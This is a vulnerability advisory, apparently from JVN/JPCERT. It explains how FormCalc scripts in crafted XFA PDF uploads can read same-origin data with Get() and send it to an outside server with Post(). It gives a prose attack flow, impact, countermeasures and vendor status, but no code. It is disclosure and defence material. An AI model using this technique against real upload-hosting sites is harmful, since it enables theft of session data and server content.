JVNTA#94087669
Using specially crafted PDF files to steal information
Overview
By embedding a script written in FormCalc in a PDF document allows a user to obtain arbitrary contents within the same origin where the original PDF is being hosted. When this behavior is exploited by an attacker in a web application or service that allows users to upload arbitrary PDF files, sensitive information on the server may be stolen.
Products Affected
This issue exists under the following server / client combination:
Client: Environment where Adobe PDF Plugin is enabled in IE11 or Firefox
Description
PDF allows the creation of documents with entry forms. As a specification to enable this, in PDF 1.5 and later, Adobe XML Form Architecture (XFA) formulated by Adobe is supported. In addition, in order to dynamically process caluclations on values entered in a form, a script language called FormCalc is available. Using this enables a user to embed a program within a PDF document.
For more information on FormCalc, including specifications, refer to the FormCalc User Reference provided by Adobe.
FormCalc provides a group of functions called URL functions in addition to functions for various kinds of arithmetic. They include functions such as Get(), Post() and Put(). These functions can be used to obtain contents for a URL by specifying the URL as a parameter or posting contents to a specific URL by passing data as a parameter. In other words, an embedded program in a PDF can download contents from the same origin or post contents to a different origin.
This behavior is part of the specification of Adobe XFA. An attacker exploiting this behavior may perform attacks mentioned in "PDF- Mess with the web".
Get()(1)' (Attacker) Trick a user into clicking the link for this PDF document
(2) (Victim) The PDF document is loaded in the web browser
(2)' (Victim) FormCalc sends the
Get() request in the context of the Victim and obtains sensitive data. Post() is used to send this data to an external serverSince the web browser sends the request in (2)', the request may contain a session cookie.
Adobe has addressed similar threat where the Same Origin Policy may be bypassed (CVE-2014-8453). However they have determined that this behavior within the same origin is expected. Web applications and users must account for this behavior.
Lastly, attack methods are also mentioned in PoC||GTFO 0x12 and PDF Special Function (FormCalc).
Impact
Effects similar to Stored XSS or CSRF may occur.
In other words, sensitive contents on the server may be obtained by an attacker, an attacker may send a malformed request to obtain account information or change system settings.
Solution
User-side countermeasures
Disable the Adobe PDF plugin in the web browser (IE11, Firefox)
Server-side countermeasures
Store PDF documents in a separate sandboxed domain.
Note that if the PDF is embedded in the web content by the attacker, even if the Content-Disposition: attachment is added to the HTTP response header, the header will be ignored, so this will not act as a countermeasure.
Vendor Status
| Vendor | Status | Last Update | Vendor Notes |
|---|---|---|---|
| BizMobile Inc. | Not Vulnerable | 2017/12/21 | |
| Cybozu, Inc. | Vulnerable | 2016/11/18 | Cybozu, Inc. website |
| JT Engineering inc. | Not Vulnerable | 2020/08/25 |
References
-
Adobe
FormCalc User Reference -
OWASP AppSecEU 15
PDF - Mess with the web -
International Journal of Proof-of-Concept or Get The Fuck Out (PoC||GTFO or PoC or GTFO)
PoC||GTFO 0x12 -
Hack Patch!
PDF Special Function (FormCalc)
JPCERT/CC Addendum
Vulnerability Analysis by JPCERT/CC
Credit
Update History
- 2017/12/21
- BizMobile Inc. update status
- 2020/08/27
- JT Engineering inc. update status